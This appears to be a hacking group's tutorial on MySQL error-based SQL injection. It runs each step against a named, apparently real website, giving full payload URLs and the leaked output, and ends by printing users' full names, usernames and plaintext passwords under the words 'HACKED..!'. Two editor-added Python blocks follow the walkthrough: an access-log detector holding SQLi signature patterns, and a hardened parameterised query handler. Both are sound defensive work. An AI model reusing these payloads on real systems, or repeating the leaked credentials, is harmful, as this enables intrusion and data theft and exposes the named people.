Error-based blind SQLi
MetalSoft #Team
Rs4 – xDarkSton3x – FailRoot – Root-M – Trouk
Notice!
The article shown below is the property of MetalSoft #Team; everything presented here was written by the Team's members. The reader is responsible for the "USE" they make of the information presented herein; MetalSoft #Team accepts no responsibility.
MySQL (Error Based) Blind SQLi
Sometimes we run into injections where "-1+union+select+0" or "order by" will not give you the number of columns and you cannot carry out the injection; we can assure you that the first reflex is to resort to a tool to do the work. This has happened to us in several injections, so we decided to investigate what other methods exist for this problem. The search turned up some results, but we still had to put them into practice to see whether they really worked.
For the practical exercise we will use
http://www.audiser.com.ar/producto.php?id=1
Finding the database:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
And the result will be: ERROR: --> 1062 - Duplicate entry '~'audiser_audiser2011'~1' for key 'group_key'
Getting the current user:
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'audiser_admin@localhost'~1' for key 'group_key'
Getting the version
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'5.1.58-community'~1' for key 'group_key'
System user
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(system_user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'audiser_admin@localhost'~1' for key 'group_key'
Hostname
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(@@hostname as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'capri.dattaweb.com'~1' for key 'group_key'
Installation directory
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(@@basedir as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'/'~1' for key 'group_key'
DB user
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(GRANTEE as char),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~''audiser_admin'@'localhost''~1' for key 'group_key'
Finding the databases
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
N is incremented.
Result: ERROR: --> 1062 - Duplicate entry '~'information_schema'~1' for key 'group_key'
Number of tables in the selected DB
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xDB_in_hex)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x617564697365725f6175646973657232303131)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'13'~1' for key 'group_key'
Table names in the DB
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x617564697365725f6175646973657232303131 limit 12,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'usuariosportal'~1' for key 'group_key'
Number of columns in the table
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x617564697365725f6175646973657232303131 AND table_name=0x7573756172696f73706f7274616c)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Table and DB in hex.
Result: ERROR: --> 1062 - Duplicate entry '~'8'~1' for key 'group_key'
Columns in the table
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x617564697365725f6175646973657232303131 AND table_name=0x7573756172696f73706f7274616c limit 6,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
The first LIMIT is incremented by 1 to obtain each column.
Result: ERROR: --> 1062 - Duplicate entry '~'Password'~1' for key 'group_key'
Number of records
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `audiser_audiser2011`.usuarios)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'3'~1' for key 'group_key'
Data extraction
http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(usuarios.user_pass as char),0x27,0x7e) FROM `audiser_audiser2011`.usuarios LIMIT 2,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Result: ERROR: --> 1062 - Duplicate entry '~'1234'~1' for key 'group_key'
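Every request in the walkthrough above belongs to one payload family: a subquery that forces a GROUP BY key collision with count(*), concat(...) and floor(rand(0)*2), so that the MySQL 1062 duplicate-entry error carries the extracted value back to the client. That combination is a very distinctive fingerprint in web-server access logs. The Python below is an added example from the editor, not code from the original write-up or from the MetalSoft team: it parses constructed access-log lines (the IP addresses, timestamps and sizes are made up; the payload text is the one shown above), URL-decodes the query string, and flags requests that carry the signature, as well as any request whose id parameter is not a plain integer.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Common/combined access-log format: ip ident user [ts] "METHOD target HTTP/x" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Fingerprints of the count(*)/floor(rand(0)*2)/GROUP BY duplicate-key payload.
# The collision trick itself ("rand_groupby") is the strongest single indicator.
SIGNATURES = {
    "rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"information_schema\s*\.", re.I),
    "count_star": re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
    "concat_hex": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I),
    "select_in_param": re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
}

# Constructed sample log: two benign requests, then the payload from the write-up,
# once percent-encoded as a browser would send it and once with raw spaces.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2011:13:55:36 -0300] "GET /producto.php?id=1 HTTP/1.1" 200 5123
192.0.2.10 - - [10/Oct/2011:13:55:40 -0300] "GET /producto.php?id=7 HTTP/1.1" 200 4980
198.51.100.23 - - [10/Oct/2011:13:56:02 -0300] "GET /producto.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,cast(database()%20as%20char),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 1874
198.51.100.23 - - [10/Oct/2011:13:56:09 -0300] "GET /producto.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 HTTP/1.1" 200 1874
"""


def decode_query(target: str) -> str:
    """Return the fully URL-decoded query string of a request target."""
    return unquote_plus(urlsplit(target).query)


def match_signatures(decoded_query: str) -> list:
    """Names of all payload fingerprints present in the decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_query)]


def param_is_integer(target: str, name: str = "id") -> bool:
    """True when every value of the parameter the app expects as a numeric id is a decimal integer."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(name, [])
    return bool(values) and all(re.fullmatch(r"-?\d+", v) is not None for v in values)


def classify(decoded_query: str, target: str) -> dict:
    """Verdict for one request: the collision trick or three independent hints means SQLi;
    a non-numeric id with no hints is still worth a lower-severity alert."""
    hits = match_signatures(decoded_query)
    verdict = "benign"
    if "rand_groupby" in hits or len(hits) >= 3:
        verdict = "error_based_sqli"
    elif not param_is_integer(target):
        verdict = "suspicious_id"
    return {"verdict": verdict, "signatures": hits}


def scan_log(text: str) -> list:
    """Parse access-log lines and return one alert per request that is not benign."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these separately
        target = m.group("target")
        result = classify(decode_query(target), target)
        if result["verdict"] != "benign":
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), **result})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["verdict"], ",".join(alert["signatures"]))
```

Running it prints one alert per injected request. The same classifier can sit on the access log or in a WAF rule; the suspicious_id verdict deserves an alert of its own, because this endpoint only ever expects a numeric id and anything else is either a broken client or a probe.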
Finally we can obtain the following data:
DB: 'audiser_audiser2011'
Table: usuarios
Columns: user_id, user_nyap, user_pass, user_usua
Data:
user_id | user_nyap         | user_pass | user_usua
5       | Audiser Argentina | 1234      | audiser11
2       | Juan Carlos Lange | 123       | juanca
1       | Pablo Abadi       | 2011      | pab_audi
We proceed to search for the admin panel and HACKED..!
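The root cause of everything above is twofold: the id value from producto.php?id= is pasted into the SQL text, and the database error message is echoed to the browser (the "1062 - Duplicate entry" text is the channel the extraction uses). The Python below is an added example by the editor, not the target application's code: it assumes a constructed producto table with id and nombre columns and uses an in-memory sqlite3 database to stand in for MySQL. It shows the vulnerable string-building pattern next to a hardened handler that whitelists the id as a positive integer, binds it as a query parameter, and returns only generic error responses.

```python
import re
import sqlite3

# Payload from the write-up above, reused here only as the input that must be rejected.
PAYLOAD = ("1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,"
           "cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),"
           "floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1")


def build_query_unsafe(raw_id: str) -> str:
    """Shape of the vulnerable pattern: the request parameter becomes part of the SQL text.
    Shown only so the reader can see what reaches the database; never use this form."""
    return "SELECT id, nombre FROM producto WHERE id = " + raw_id


def parse_product_id(raw_id: str) -> int:
    """Whitelist validation: a positive decimal integer of at most 10 digits, nothing else."""
    if not re.fullmatch(r"[1-9]\d{0,9}", raw_id):
        raise ValueError("invalid product id")
    return int(raw_id)


def lookup_product(conn, raw_id: str):
    """Hardened query: validate first, then bind the value so the SQL text is constant.
    sqlite3 uses '?' placeholders; MySQL drivers (mysql-connector, PyMySQL) use '%s'
    with the same binding semantics."""
    product_id = parse_product_id(raw_id)
    cur = conn.execute("SELECT id, nombre FROM producto WHERE id = ?", (product_id,))
    return cur.fetchone()


def handle_request(conn, raw_id: str) -> dict:
    """What the endpoint should return: the row for a valid id, generic errors otherwise.
    Database exceptions are never echoed to the client; they belong in the server log."""
    try:
        row = lookup_product(conn, raw_id)
    except ValueError:
        return {"status": 400, "body": "bad request"}
    except sqlite3.Error:
        return {"status": 500, "body": "internal error"}
    if row is None:
        return {"status": 404, "body": "not found"}
    return {"status": 200, "body": {"id": row[0], "nombre": row[1]}}


def make_demo_db():
    """Constructed in-memory stand-in for the application's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE producto (id INTEGER PRIMARY KEY, nombre TEXT)")
    conn.executemany("INSERT INTO producto VALUES (?, ?)",
                     [(1, "constructed product A"), (2, "constructed product B")])
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print("unsafe SQL would be:", build_query_unsafe(PAYLOAD)[:80], "...")
    print("valid id   ->", handle_request(db, "1"))
    print("payload    ->", handle_request(db, PAYLOAD))
```

With the parameter bound, the payload can never be parsed as SQL, and with the whitelist it is rejected before a query is even issued; the generic 400/404/500 bodies close the error channel that the duplicate-entry messages above provided. The same two changes (integer whitelist plus a prepared statement) apply unchanged to PHP with PDO or mysqli against MySQL.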
MetalSoft #Team